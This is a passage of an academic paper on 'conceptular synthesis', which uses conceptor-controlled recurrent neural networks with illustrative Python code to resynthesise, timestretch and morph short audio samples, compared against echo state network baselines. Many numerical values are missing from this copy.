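    crossings = np.where((y[:-1] > 0) & (y[1:] < 0))[0] + 1
    bounds = np.concatenate(([0], crossings, [len(y)]))
    return [y[s:e] for s, e in zip(bounds[:-1], bounds[1:]) if e > s]
```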
hyperparameters and training

a key parameter is the reservoir size ψ. ψ correlates with the memory capacity of the reservoir; it should be at least equal to the number of independent variables needed for the task the model is being trained for (jaeger, ). as we increase the quantity and length of training signals, we need to increase ψ to give the model the capacity to learn them. however, increasing ψ makes computation more expensive (at approximately o(n )), so there are practical limits to this value. the other key parameter is the leak rate α. lowering α has the effect of filtering out high frequencies in the reservoir activation levels x, and therefore slowing down the behaviour of the rnn. α needs to be chosen such that the model can reproduce the frequency content of the source audio; for example, a sound with dominant low frequencies like the kick drum in fig. will need a network with slowly changing activations, and therefore a low α value. optimal values can be found using a grid search. after choosing hyperparameters, a model is trained using the techniques set out earlier in the paper. the output is a set of conceptors, calculated to reproduce each audio signal a_j.

figure : a comparison of the original kick drum sample and the output of the trained ccrnn model (waveform plot, amplitude against time in samples, original versus reconstruction).

table : hyperparameters in the resynthesis quality experiment. columns: model type, ψ, α, γ_w, γ_input, γ_bias, λ, ρ_w, ρ_out. the ccrnn row fixes most values and searches α over a grid, while the esnspf row searches several parameters over ranges (the numeric values are lost in this copy).

resynthesis

to resynthesise the training signal, the ccrnn is initially run for λ steps with the first conceptor c_1. the model is then run with each conceptor c_j inserted into the update loop, as described in eqs. ( ) and ( ), to create a set of output signals q. the number of samples for which each conceptor is used in the runtime loop corresponds to the length of the audio signal from which the conceptor was trained. the algorithm makes a short linear crossfade between conceptors, over a small percentage of the pattern length. this prevents artefacts appearing from instantaneous switching of conceptors. finally, the output signals are appended to create the waveform k = [q_1 | q_2 | … | q_n].

example: resynthesis of a kick drum

the output of a trained conceptular synthesis model is now shown, to illustrate how this technique can be applied. a ccrnn model was trained to resynthesise a kick drum. the original audio (see fig. and audio s ) was re-sampled at hz (half of cd quality) in order to reduce the cpu load of training. the sample was segmented using the zero-crossing method, and the model was trained with the parameters shown in table , with leak rate α = . . the kick drum sample was resynthesised with the crossfade length set at % of signal length. the result is shown in figs. and , and included in audio s . both show a close reconstruction of the original, with the addition of some high-frequency artefacts. this example is not compared quantitatively to the original; instead, this is done systematically in the experiment below.
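a rough sketch of the resynthesis loop described above follows, reusing the update style of run_with_conceptor from the earlier sketch. the text does not specify exactly how the linear crossfade is realised; blending consecutive conceptors, as done here, is one plausible reading, and xfade_frac stands in for the unspecified percentage of the pattern length.

```python
import numpy as np

def conceptular_resynthesis(conceptors, lengths, W, W_out, b, alpha,
                            washout, xfade_frac=0.1):
    psi = W.shape[0]
    x = np.random.uniform(-1.0, 1.0, psi)
    # settle the reservoir with the first conceptor for `washout` steps
    for _ in range(washout):
        x = conceptors[0] @ ((1.0 - alpha) * x + alpha * np.tanh(W @ x + b))
    out = []
    for j, (C, length) in enumerate(zip(conceptors, lengths)):
        C_next = conceptors[min(j + 1, len(conceptors) - 1)]
        n_fade = int(xfade_frac * length)
        for n in range(length):
            if n_fade > 0 and n >= length - n_fade:
                w = (n - (length - n_fade)) / n_fade      # 0 -> 1 over the fade
                C_use = (1.0 - w) * C + w * C_next
            else:
                C_use = C
            x = C_use @ ((1.0 - alpha) * x + alpha * np.tanh(W @ x + b))
            out.append((W_out @ x).item())
    return np.array(out)
```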
measuring resynthesis quality

we have seen the potential of conceptular synthesis to resynthesise audio from trained ccrnn models. these trained models offer extensive creative possibilities for sound synthesis, which are detailed later in the paper. before exploring these avenues, the quality of the resynthesis method should be evaluated, in comparison to an existing baseline.

figure : spectrograms comparing the resynthesised kick drum (a) to the original sample (b).

baseline models: echo state networks with stored patterns and feedback

the closest comparable method to conceptular synthesis is to use esns with output feedback as trainable oscillators. feedback is used to guide the reservoir dynamics to a stable limit cycle where the model is outputting a desired signal. early research on esns (jaeger, ) showed their capability for self-driven oscillation using output feedback. more recent research has focused on increasing the effectiveness of output feedback by adapting the weight matrix w to increase the accuracy of reproduced patterns. jaeger ( a) summarises this family of techniques, including self-prediction (mayer & browne, ), self-sensing networks (sussillo & abbott, ) and jaeger's own method for storing patterns, which has already been detailed in this paper. the reservoirs for both techniques are created using the same stored-pattern method, but the methods then diverge. these baseline models will be referred to as esnspfs.

the training method for esnspfs works as follows: a set of audio signals is stored in an rnn, using the same approach as detailed earlier with eqs. ( ), ( ) and ( ). the result of this process is to adapt the randomly initialised weight matrix w∗ into the trained matrix w. this model is then used to train a set of output weight matrices, such that each matrix w_out^j will be used to recreate audio signal a_j. to train an esnspf using output feedback, we train an output layer that predicts the next sample of the input signal. the model is driven with signal a_j using eqs. ( ) and ( ). following a washout period, the states x(n) from timesteps λ to λ+φ−2 are stored in a ψ × (φ−1) matrix x. the samples of the audio signal a_j from λ+1 to λ+φ−1 are stored in a 1 × (φ−1) matrix p. the output weight matrix w_out^j can then be calculated using eq. ( ). feedback models are sensitive to initial conditions; a brute-force search can be used to find a good value for the initial state x(0), stored for later use as x_cue.

at runtime, the model is run by feeding the output back into the input with a modification of eq. ( ), starting from the initial state x_cue. to reproduce audio signal a_j, the model is updated as follows:

z(n+1) = w x(n) + w_in y(n)   ( )
x(n+1) = (1 − α) x(n) + α tanh(z(n+1) + b)   ( )
y(n+1) = w_out^j x(n+1)   ( )

to recreate a sequence of patterns or grains that comprise a longer audio signal, each output matrix w_out^j is sequentially inserted into the runtime loop for a period matching the length of the audio signal a_j.
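the esnspf training and feedback runtime described above can be sketched as follows, reusing harvest_states and ridge_solve from the earlier sketches; as before, this is an illustrative reconstruction and the names are mine.

```python
import numpy as np

def train_esnspf_readout(a_j, W, W_in, b, alpha, washout, rho_out):
    """train one output matrix to predict the next sample of a_j."""
    _, X, _, P = harvest_states(a_j, W, W_in, b, alpha, washout, repeats=1)
    # inputs: states up to lambda+phi-2; targets: samples from lambda+1 onwards
    return ridge_solve(X[:, :-1], P[:, 1:], rho_out)

def esnspf_run(W, W_in, W_out_j, b, alpha, x_cue, n_steps):
    """runtime loop with output feedback: the previous output sample is fed
    back through W_in in place of an external driving signal."""
    x = x_cue.copy()
    y = (W_out_j @ x).item()
    out = np.zeros(n_steps)
    for n in range(n_steps):
        z = W @ x + W_in * y
        x = (1.0 - alpha) * x + alpha * np.tanh(z + b)
        y = (W_out_j @ x).item()
        out[n] = y
    return out
```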
dataset

sounds from the ixi lang data set (magnusson & kiefer, ) were used to compare the two methods. this is the collection of sounds that accompanies the ixi lang live coding environment. the collection represents a wide variety of short samples that are used for live performance. there are audio clips, lasting between ms and . s (mean: . s).

method

each sample was resampled at , hz, normalised, scaled by half, and truncated to a maximum of , samples (or . s); this was to strike a balance between the computational demands on the model and providing enough material to make a useful comparison. the sample was then sliced; the zero-crossing method (eq. ( )) was used, as this is more widely applicable to a range of timbres. a maximum of patterns were kept from the slicing process, again to reduce demands on computation time and on memory for storing conceptors. this process resulted in a set of patterns extracted from each sample in the dataset. esnspf and ccrnn models were trained to resynthesise each pattern set, and then used to resynthesise the corresponding samples. table shows the hyperparameters used for both model types, chosen to match the models as fairly as possible for comparison. some were fixed; others were searched for within the ranges shown. fixed hyperparameters were chosen based on experimental reports in the wider literature (lukoševičius, ; jaeger, ; jaeger, b) and through extensive manual experimentation. some parameters were deemed to be sensitive to the training material (for example, α needs to be tuned to match the frequencies in the source), in which case the values were optimised through automatic search, as detailed below. the use of randomly determined weight values is fundamental to the design of both models; however, this leads to variance in training results. to mitigate this variance, the training process was run multiple times at each hyperparameter setting and the best models chosen. it is acknowledged that, as with all non-deterministically generated models, it is possible that the optimal model will not be found, but running the training process multiple times increases the possibility of finding a better model. further to this, variances in this process will be averaged out across the samples in the dataset.

ccrnn models

the key hyperparameter for this model type was the leak rate α, which needed to be tuned to match the frequency response of the model to the frequencies needed for resynthesis of the training material. for each sample in the dataset, α was determined through a grid search (as recommended in lukoševičius, ) of values { . , . , . ... . }. the grid search evaluated models at each of these settings at a lower model size (ψ = ) in order to save computation time, evaluating different models and recording the best mfcc error. this process resulted in an optimal value of α, which was used to evaluate models at a higher model size (ψ = ). the highest score of these models was recorded.

esnspf models

models trained with output feedback showed sensitivity to four parameters: model size ψ, leak rate α, bias scaling γ_bias and input scaling γ_input. interestingly, this technique showed sensitivity to ψ, while ccrnn models show consistent improvement with larger ψ. a four-dimensional grid search was impractical due to computational demands; instead, a microbial genetic algorithm (harvey, ) was used to find optimal values, conducting a stochastic evolutionary search of the parameters in the ranges shown in table . the fitness function selected the best model based on evaluations of models created with identical hyperparameters. each model was then evaluated with randomised starting states x_cue, and the x_cue with the lowest error was chosen.
results

the experiment resulted in an error score for each model type for each of the samples in the dataset. the two methods gave comparable results (fig. ) (ccrnn: mean . , median . ; esnspf: mean . , median . ). there was no significant difference between the model types (wilcoxon signed-rank test: w = , p = . ). these results are discussed further below, after contextualisation within the extended synthesis techniques.

extended conceptular synthesis techniques

the above experiment demonstrates that ccrnn models are capable of sound synthesis quality comparable to esnspfs. moving beyond this baseline, they offer a wider range of creative sound synthesis possibilities.

extended sound synthesis parameters

the sound generation algorithm can be manipulated with three key parameters: speed, leak rate scale, and weight scaling. the speed parameter changes the amount of time the algorithm waits until a new conceptor is plugged into the rnn update loop. for example, a speed of 0.5 results in two cycles of a pattern being played for each conceptor c_j, and a rendered sample that is twice the length of the original. at negative speeds, a sample can be crudely reversed by playing the patterns in reverse sequence. this parameter can have the effect of timestretching, i.e., extending or compressing the length of a sound independently of its pitch. audio s presents an example of timestretching from % up to % in % steps with a ccrnn model trained on a kick drum sample.

figure : a violin plot of mfcc error scores for each model type, for resynthesis of samples in the ixi lang dataset. the plot shows the distribution of scores, with real values marked by vertical lines.

the leak rate α can be scaled during resynthesis by updating eq. ( ) as follows:

α_scaled = α ξ_α   ( )
x(n+1) = (1 − α_scaled) x(n) + α_scaled tanh(z(n+1) + b)   ( )

ξ_α becomes a useful parameter in resynthesis for control over timbre and pitch (which is explained later when discussing pitch-controlled oscillators). it should be limited such that the scaled α stays between 0 and 1. weight scaling can be introduced by updating eq. ( ) so that the weight matrix is linearly scaled by the scalar ξ_w:

w_scaled = w ξ_w   ( )
z(n+1) = w_scaled x(n) + w_in a(n+1)   ( )

this causes timbral changes in the rendered sample whose characteristics are based on the random make-up of the rnn. there is some consistency in this parameter, in that when it is raised, more high-frequency content tends to be introduced. at higher values, the rnn can behave in musically interesting non-linear ways. below a lower limit (model dependent), the model output tends towards silence. further manipulations of sound can be achieved by manipulating conceptors.

extending sound synthesis with conceptor logic

the use of conceptor logic and conceptor manipulation is where this mode of sound synthesis significantly moves on from standard granular synthesis features and brings its own unique possibilities. new conceptors can be created using boolean logic rules; jaeger ( b) defines formulae for and, or and not operations. boolean operations provide a system of logic with which to combine conceptors, with applications in classification and memory management. in the case of conceptular synthesis, logic operations provide a wide range of creative possibilities.
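the boolean operations referred to above are jaeger's matrix-conceptor definitions, and the examples that follow use or. a compact (and slightly simplified) rendering is given below: the pseudo-inverse is used here as a shortcut where jaeger's definitions treat singular matrices more carefully, so this is a sketch rather than a faithful reimplementation.

```python
import numpy as np

def c_not(C):
    # NOT C = I - C
    return np.eye(C.shape[0]) - C

def c_and(C1, C2):
    # C1 AND C2 = (C1^-1 + C2^-1 - I)^-1, with pseudo-inverses as a guard
    I = np.eye(C1.shape[0])
    return np.linalg.pinv(np.linalg.pinv(C1) + np.linalg.pinv(C2) - I)

def c_or(C1, C2):
    # de morgan: C1 OR C2 = NOT(NOT C1 AND NOT C2)
    return c_not(c_and(c_not(C1), c_not(C2)))
```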
conceptors can be logically recombined to create new timbral variations. two examples are now given.

figure : the waveform of a variant of a snare sample, produced using the boolean logic rule c′_j = c_j ∨ c_{j+1} ∨ c_{j+2} ∨ c_{j+3} (original versus resynthesis, amplitude against time in samples).

figure : waveforms showing generative variants of the snare sample, using the boolean logic rule c′_j = c_j ∨ c_random ∨ c_random.

example 1: a ccrnn model was trained to reproduce a snare sample (audio s ). each conceptor c_j in the snare model was combined with the subsequent three conceptors to make a new set c′, using the rule c′_j = c_j ∨ c_{j+1} ∨ c_{j+2} ∨ c_{j+3}. this resulted in a variant of the original snare sound, shown in fig. (audio s ).

example 2: a new set of conceptors c′ was made by combining each conceptor in the set with a random choice of two other conceptors in the set: c′_j = c_j ∨ c_random ∨ c_random. this is designed with the intention of keeping the main structure of the sample while introducing random variations. fig. shows the resulting waveforms from separate iterations of this process using the snare model detailed above (audio s ). in both of these examples the variations are subtle, and the renderings suffer from some audible artefacts; however, this does point to generative possibilities that are worthy of further research.
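using the c_or helper sketched earlier, the two recombination rules above could be generated along the following lines; the wrap-around indexing for the final conceptors in the set and the rng handling are my assumptions rather than details given in the text.

```python
import numpy as np

def variant_set_sequential(conceptors, span=3):
    """example 1: OR each conceptor with the following `span` conceptors."""
    n = len(conceptors)
    new_set = []
    for j, C in enumerate(conceptors):
        acc = C
        for k in range(1, span + 1):
            acc = c_or(acc, conceptors[(j + k) % n])   # wrap at the end of the set
        new_set.append(acc)
    return new_set

def variant_set_random(conceptors, n_extra=2, seed=None):
    """example 2: OR each conceptor with a random choice of two others."""
    rng = np.random.default_rng(seed)
    new_set = []
    for C in conceptors:
        acc = C
        for _ in range(n_extra):
            acc = c_or(acc, conceptors[rng.integers(len(conceptors))])
        new_set.append(acc)
    return new_set
```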
sound morphing with interpolated conceptors

jaeger ( b) demonstrated shape morphing between heterogeneous patterns using conceptors. this same technique can be applied within conceptular synthesis to morph between sounds. it is not within the scope of this paper to analyse the quality of sound morphing using conceptular synthesis in comparison to other techniques, but rather to demonstrate that sound morphing is a creative possibility with ccrnns and to outline how it can be achieved. morphing can be implemented by creating a linear combination of conceptors to interpolate between the two patterns that the conceptors were trained to recreate. equation ( ) shows how this can be done with two conceptors, where ω is the morphing factor:

x(n+1) = ((1 − ω) c_i + ω c_j) tanh(w x(n) + b)   ( )

varying ω between 0 and 1 forces the rnn to create a morph between the patterns represented by the two conceptors. when 0 ≤ ω ≤ 1, the mix of conceptors will interpolate between the patterns; when ω is outside this range, the mix of conceptors can extrapolate beyond them. the intention of morphing between sounds is to create a new mixture of sounds that retains the shared perceptual properties of the original sources (slaney, covell & lassiter, ). morphing was investigated with conceptular synthesis by training a ccrnn to recreate patterns from two different samples: the snare sample already discussed, and a short bongo sample (audio s ). an -node network was trained to recreate individual patterns (of fixed length) for each sample, resulting in two sets of conceptors, c_snare and c_bongo. morphing was achieved by creating a new set of conceptors based on a linear mixture of the trained conceptors, for each pattern segment. the results demonstrate a morph between the samples that is different from a linear mixture of the two samples. figure s shows how the time-domain waveform varies over a -point morph from ω = 0 to ω = 1, and the result can be heard in audio s . for comparison, fig. s and audio s demonstrate a linear mix between the amplitude values of the same two samples. boolean conceptor logic can also be used for sound morphing. for example, a set of conceptors c_bongosnare was created, with each element combining elements from the snare and the bongo: c_j^bongosnare = c_j^bongo ∨ c_j^snare. a sample rendered with this conceptor set contains characteristics of both sounds (audio s ).

equivalent techniques with esnspf models

where possible, equivalent extended sound manipulation techniques were attempted with esnspf models. there is no parallel for conceptor logic using esnspf models. however, it is possible to manipulate ξ_α and ξ_w during resynthesis, and also to introduce the same timestretching mechanism as for ccrnn models. attempts at all of these methods, however, did not lead to satisfactory results. timestretching with esnspfs only works when slowing down playback at integer subdivisions of the original speed; at other ratios, the models tend to quickly converge to silence. when altering ξ_α and ξ_w, the models tend towards producing high-amplitude artefacts. to demonstrate this, all models trained in the experiment above were tested with either ξ_α or ξ_w set to values { . , . ... . }. figure shows the average percentage change in the standard deviation of the amplitudes of resynthesised waveforms, compared to waveforms generated with ξ_α = 1 and ξ_w = 1. for esnspfs, this change in standard deviation is high compared to the same measurement for conceptular synthesis models, reflecting the high-amplitude artefacts introduced by the change in these values. ccrnn models, however, remain close to the original amplitude range (although with some very small variation).

figure : demonstration of the effects of ξ_α and ξ_w on waveform amplitude (percentage change in σ plotted against the scaling value, for feedback and conceptor models), reflecting high-amplitude artefacts in the esnspf models.

discussion

this work demonstrates how ccrnns can be used to resynthesise short samples by dividing the sample into short signals and training a conceptor for the reproduction of each one. an experiment on resynthesising the ixi lang dataset shows that conceptular synthesis can achieve resynthesis quality comparable to echo state network models that use stored patterns and feedback, when measured using mfccs. neither type of model could perfectly reproduce the training samples, but both were able to make reasonable reconstructions. there was some variance in resynthesis quality across the results, the causes of which are a topic for future investigation.
ccrnn models offer malleable sound synthesis possibilities when manipulated using inherent runtime parameters and through conceptor combinations created either by interpolation or by boolean logic. these techniques give unsatisfactory results when attempted with equivalent implementations in esnspf models. this is likely to be due to the high sensitivity to initial conditions of models that use output feedback. while they can provide good-quality resynthesis, esnspf models are brittle in nature, whereas ccrnns show themselves to be highly robust to manipulation during resynthesis, making them extremely valuable as creative tools. there is natural variability between models, due to the random initialisation of the rnn. this variability is minimised when using the network within normal constraints; however, when a network is pushed into non-linear modes of behaviour by, for example, changing the value of ξ_w, higher variability between different ccrnns can be observed. this behaviour for a particular network may turn out to be musically interesting, lending conceptular synthesis potential for the serendipitous discovery of new sounds, and a level of generative unpredictability that is often valued by musicians (mccormack et al., ).

is it possible that, by using the reconstruction error as the evaluation metric, this experiment has produced models that are flawed because of overfitting? in this context, overfitting would be the production of generative models that are only useful for reproducing the training data, but that do not function well as malleable creative tools when manipulated using the techniques described above, i.e., they would have a limited aesthetic state space (eldridge, ). conventionally in esn research, the complexity of reservoirs, approximately determined by the size of n, has been established as a factor in overfitting in discriminative models (wyffels & schrauwen, ); however, there is very little research on the nature of overfitting in generative esns and related models, especially with regard to creating malleable models. jaeger acknowledges that there are open questions around the concept of overfitting (jaeger, ). the experimental results do not indicate that n is a factor in overfitting in this experiment. in the search for esnspf models, n was optimised through evolutionary search. the resulting values of n follow an approximately flat distribution across the search range (mean , std: ). if higher n had resulted in higher-scoring (but overfitted) models, these values would have been skewed towards larger model sizes. further investigation revealed no significant correlation between n and reconstruction error. the measurement of high-amplitude artefacts produced by manipulation of ξ_α and ξ_w (as detailed above) could be taken as a metric for basic malleability. there was no significant correlation between n and the level of artefacts, overall showing a lack of evidence for a connection between n and the possible effects of overfitting in esnspfs. ccrnn models were produced with a fixed n, and have shown themselves to be highly malleable in the examples detailed in this project. when producing generative reservoir models, increasing n could give the model more opportunity for varied dynamical behaviours rather than limiting its scope; overfitting in generative reservoir models is certainly a nebulous concept that warrants future attention.
an audio synthesis process would ideally run in realtime. in this example, the rendering was carried out on a cpu, and was around times slower than realtime. while this leaves much room for improvement, it should be noted that this version was not optimised for speed, and a dedicated c++ or gpu renderer is expected to be faster than the python version used here. it does, however, show the scale of computation involved in this method of sound synthesis, and indicates that computational resources are a challenge in this area.

conclusions and future work

the experiments presented here show how recurrent neural networks under conceptor control, as originally described in jaeger ( b), can be configured, trained and run as sample-level sound synthesisers. conceptular synthesis is an extension of granular synthesis, in which a ccrnn is trained to reproduce very short segments of a sound sample, using conceptors to recall the different patterns. it is controlled at runtime to recombine these short segments into a longer continuous sound. the models were not limited to straightforward sound reproduction; ccrnns presented a large variety of creative options for synthesising new sounds based on the training materials. techniques included classic granular synthesis methods: timestretching and compression, and creative recombination of grains. these were extended by the new possibilities of combining conceptors, using boolean conceptor logic, and using linear combinations of conceptors to morph between signals. the leak rate of the rnn nodes and the rnn spectral radius can be manipulated at runtime to create new sonic possibilities. ccrnns were shown to have resynthesis quality similar to the baseline esnspf models, when compared using mfccs. ccrnns, however, excelled in their possibilities for creative sound manipulation, compared to esnspfs, which produced either significant artefacts or silence when manipulated.

the experiments outlined common limitations of ccrnn models for sound synthesis. there was always some high-frequency loss in the reproduction of the original driving audio signals; further experimentation is needed to discover the source of this issue. issues with high frequencies are affected by the choice of leak rate α, which needs to be chosen carefully to slow down the rnn dynamics for the reproduction of low-frequency patterns, while also preserving enough high-frequency dynamics. it is possible that oversampling may help, although the efficiency impact of oversampling could be significant considering the high computational cost of training and running these models. this work helps to answer the questions posed at the beginning of the paper concerning the fundamental capability of conceptors to synthesise audio signals. conceptors are able to generate the longer patterns needed for audio signals at reasonable sample rates, as demonstrated by the resynthesis of simple sine-like patterns up to samples long in the example of the kick drum, and the resynthesis of varied audio materials in the ixi lang dataset. these pattern lengths are relatively short but useful enough for sound synthesis. as pattern lengths extend, pragmatic limits on computational resources restrict further exploration.
the resynthesis quality experiment established that, when training models with multi-timbre sounds, there is variance in the ability of ccrnn models to reproduce these sounds accurately, indicating sensitivity in ccrnns to sonic qualities in the source materials. it is not yet clear what this relationship is; this should be the topic of further investigations. conceptular synthesis required large models (of approximately nodes upwards) to produce reasonable results, resulting in slow resynthesis times. the large size of these models was required for them to be able to learn either long patterns or high volumes of short patterns. the technique ran at around times slower than realtime. the memory requirements for conceptular synthesis were particularly large, as a conceptor was needed to reproduce each training signal, resulting in model sizes between . and gb in the experiments above. these computation requirements may still be considered lightweight compared to some deep learning sound-synthesis techniques; nevertheless, it would be a considerable success if these models could be optimised to reach realtime at reasonable sample rates. recent research into deep architectures in echo state networks may offer promise for increasing computational efficiency, as they have been shown to have better memory capacity than classical esns with similar numbers of nodes (gallicchio, micheli & silvestri, ). more broadly, the relationship between memory capacity and computation time will be a limit on sound synthesis with ccrnns and on their potential to move beyond short sound samples, until methods are found to change architectures and reduce this dependency.

this initial demonstration of the potential of sound synthesis with ccrnns stimulates further questions. future research should establish:

1. how these techniques can be scaled upwards to facilitate learning models of longer sound samples;
2. the causes of variance in resynthesis quality when training models with signals of varied timbre;
3. whether high-frequency loss in resynthesis can be resolved;
4. how to optimise the rnn leak rate α for sounds with wide frequency ranges;
5. how the techniques identified in this paper can be extended for the purpose of generative sound synthesis;
6. how to optimise network architectures to achieve closer-to-realtime performance;
7. how to conceptualise overfitting, in the context of producing creatively malleable generative models;
8. the potential for use with analysis and resynthesis in the spectral domain (as we are seeing with systems such as nsynth (engel et al., ) and gansynth (engel et al., )).

conceptually, ccrnn architectures could be creatively compelling for computer musicians; it can sometimes be challenging to create believable and coherent complexity with standard digital sound generation and editing tools. with ccrnns, complexity comes for free and needs to be managed instead of created. the models presented here are inherently variable, and can easily be encouraged towards unpredictability and nonlinearity, creating sometimes surprising and serendipitous results. the models offer plenty of entry points for creative manipulation, with a potentially wide aesthetic state space (eldridge, ). the musician must interact with these models, rather than control them. the experiments presented here have mapped out initial explorations into sound synthesis with ccrnns.
they extend a classical sound synthesis method, bringing boolean logic, pattern morphing and non-linear modulation possibilities into granular-style synthesis. the techniques exhibit some limitations that require further investigation, but also show unique creative possibilities for musicians, and rich potential for further research in this area. acknowledgements thank you to sussex humanities lab for generous access of their computing facilities. additional information and declarations funding the author received no funding for this work. competing interests the author declares there are no competing interests. author contributions • chris kiefer conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: code is available at github: https://github.com/chriskiefer/conceptorsoundsynthesis https://github.com/chriskiefer/conceptularbeatsynth. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/chriskiefer/conceptorsoundsynthesis https://github.com/chriskiefer/conceptularbeatsynth http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references donahue c, mcauley j, puckette m. . synthesizing audio with generative adversarial networks. arxiv preprint. arxiv: . . duport f, smerieri a, akrout a, haelterman m, massar s. . fully analogue photonic reservoir computer. scientific reports : doi . /srep . eldridge a. . you pretty little flocker: exploring the aesthetic state space of creative ecosystems. artificial life ( ): – doi . /artl_a_ . engel j, agrawal kk, chen s, gulrajani i, donahue c, roberts a. . gansynth: adversarial neural audio synthesis. arxiv preprint. arxiv: . . engel j, resnick c, roberts a, dieleman s, eck d, simonyan k, norouzi m. . neural audio synthesis of musical notes with wavenet autoencoders. arxiv preprint. arxiv: . . fernando c, sojakka s. . pattern recognition in a bucket. in: european conference on artificial life. berlin, heidelberg: springer, – . fiebrink r. . real-time human interaction with supervised learning algorithms for music composition and performance. phd thesis, princeton university. gabor d. . acoustical quanta and the theory of hearing. nature ( ): – doi . / a . gallicchio c, micheli a, silvestri l. . local lyapunov exponents of deep echo state networks. neurocomputing : – doi . /j.neucom. . . . gast r, faion p, standvoss k, suckro a, lewis b, pipa g. . encoding and decoding dynamic sensory signals with recurrent neural networks: an application of concep- tors to birdsongs. biorxiv . ghedini f, pachet f, roy p. . creating music and texts with flow machines. in: multidisciplinary contributions to the science of creative thinking. singapore: springer, – . hamel p, eck d. . learning features from music audio with deep belief networks. in: proceedings of the international society of music information retrieval, vol. . the netherlands: utrecht, – . harvey i. . the microbial genetic algorithm. in: european conference on artificial life. berlin: springer, – . holzmann g. a. echo state networks with filter neurons and a delay and sum readout. neural networks ( ): – . holzmann g. b. 
reservoir computing: a powerful black-box framework for nonlinear audio processing. in: dafx. ianigro sc, bown o. . exploring continuous time recurrent neural networks through novelty search. in: luke dahl, douglas bowman tm, eds. proceedings of the international conference on new interfaces for musical expression. blacksburg: virginia tech, – . kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://arxiv.org/abs/ . http://dx.doi.org/ . /srep http://dx.doi.org/ . /artl_a_ http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / a http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. jaeger h. . short term memory in echo state networks. technical report. fraunhofer institute for autonomous intelligent systems. jaeger h. . a tutorial on training recurrent neural networks, covering bppt, rtrl, ekf and the ‘‘echo state network’’ approach. technical report. fraunhofer institute for autonomous intelligent systems. jaeger h. . the ‘‘echo state’’ approach to analysing and training recurrent neural networks-with an erratum note. technical report . bonn, germany: german national research center for information technology gmd. jaeger h. a. conceptors: an easy introduction. arxiv preprint. arxiv: . . jaeger h. b. controlling recurrent neural networks by conceptors. arxiv preprint. arxiv: . . jaeger h. . using conceptors to manage neural long-term memories for temporal patterns. journal of machine learning research ( ): – . jaeger h, eck d. . can’t get you out of my head: a connectionist model of cyclic rehearsal. in: zif workshop. – . jaques n, gu s, bahdanau d, hernández-lobato jm, turner re, eck d. . sequence tutor: conservative fine-tuning of sequence generation models with kl-control. arxiv preprint. arxiv: . . jensen jh, christensen mg, ellis dp, jensen sh. . quantitative analysis of a com- mon audio similarity measure. ieee transactions on audio, speech, and language processing ( ): – . jones b, stekel d, rowe j, fernando c. . is there a liquid state machine in the bacterium escherichia coli? in: ieee symposium on artificial life, hawaii, usa. piscataway: ieee. keuninckx l, danckaert j, van der sande g. . real-time audio processing with a cascade of discrete-time delay line-based reservoir computers. cognitive computation ( ): – doi . /s - - - . khunarsal p, lursinsap c, raicharoen t. . very short time environmental sound classification based on spectrogram pattern matching. information sciences : – . kiefer c. . musical instrument mapping design with echo state networks. in: nime ’ : proceedings of the th international conference on new interfaces for musical expression. lukoševičius m. . a practical guide to applying echo state networks. in: neural networks: tricks of the trade. berlin: springer, – . maass w, natschläger t, markram h. . real-time computing without stable states: a new framework for neural computation based on perturbations. neural computation ( ): – . magnusson t, kiefer c. . dataset of sounds used with the ixi lang live coding en- vironment. available at https://sussex.figshare.com/articles/dataset_of_sounds_used_ with_the_ixi_lang_live_coding_environment/ doi . /sussex. .v . mayer nm, browne m. . echo state networks and self-prediction. in: international workshop on biologically inspired approaches to advanced information technology. – . kiefer ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - https://sussex.figshare.com/articles/dataset_of_sounds_used_with_the_ixi_lang_live_coding_environment/ https://sussex.figshare.com/articles/dataset_of_sounds_used_with_the_ixi_lang_live_coding_environment/ http://dx.doi.org/ . /sussex. .v http://dx.doi.org/ . /peerj-cs. mccormack j, eldridge a, dorin a, mcilwain p. . generative algorithms for making music: emergence, evolution, and ecosystems. in: dean rt, ed. the oxford handbook of computer music. oxford handbooks. oxford: oxford university press. mehri s, kumar k, gulrajani i, kumar r, jain s, sotelo j, courville a, bengio y. . samplernn: an unconditional end-to-end neural audio generation model. arxiv preprint. arxiv: . . mudd t. . nonlinear dynamics in musical interactions. phd thesis, the open university. available at http://oro.open.ac.uk/ / . oord avd, dieleman s, zen h, simonyan k, vinyals o, graves a, kalchbrenner n, senior a, kavukcuoglu k. . wavenet: a generative model for raw audio. arxiv preprint. arxiv: . . pampalk e, dixon s, widmer g. . on the evaluation of perceptual similarity measures for music. in: of: proceedings of the sixth international conference on digital audio effects (dafx- ). – . roads c. . automated granular synthesis of sound. computer music journal ( ): – . roads c. . microsound. cambridge: mit press. sanfilippo d, valle a. . feedback systems: an analytical framework. computer music journal ( ): – . schrauwen b, verstraeten d, van campenhout j. . an overview of reservoir computing: theory, applications and implementations. in: proceedings of the th european symposium on artificial neural networks. – . schwarz d. . concatenative sound synthesis: the early years. journal of new music research ( ): – . slaney m, covell m, lassiter b. . automatic audio morphing. in: acoustics, speech, and signal processing, . icassp- . conference proceedings., ieee international conference, on vol. . piscataway: ieee, – . sussillo d, abbott l. . transferring learning from external to internal weights in echo-state networks with sparse connectivity. plos one ( ):e doi . /journal.pone. . tidemann a, demiris y. . groovy neural networks. in: proceeding of the conference on ecai : th european conference on artificial intelligence. truax b. . real-time granular synthesis with the dmx- . in: berg p, ed. proceedings of the international computer music conference. the hague: computer music association. truax b. . discovering inner complexity: time shifting and transposition with a real- time granulation technique. computer music journal ( ): – . wyffels f, schrauwen b. . a comparative study of reservoir computing strategies for monthly time series prediction. neurocomputing ( ): – . subspace learning/selected papers from the european symposium on time series prediction doi . /j.neucom. . . . wyse l. . real-valued parametric conditioning of an rnn for interactive sound synthesis. in: th international workshop on musical metacreation, international conference on computational creativity 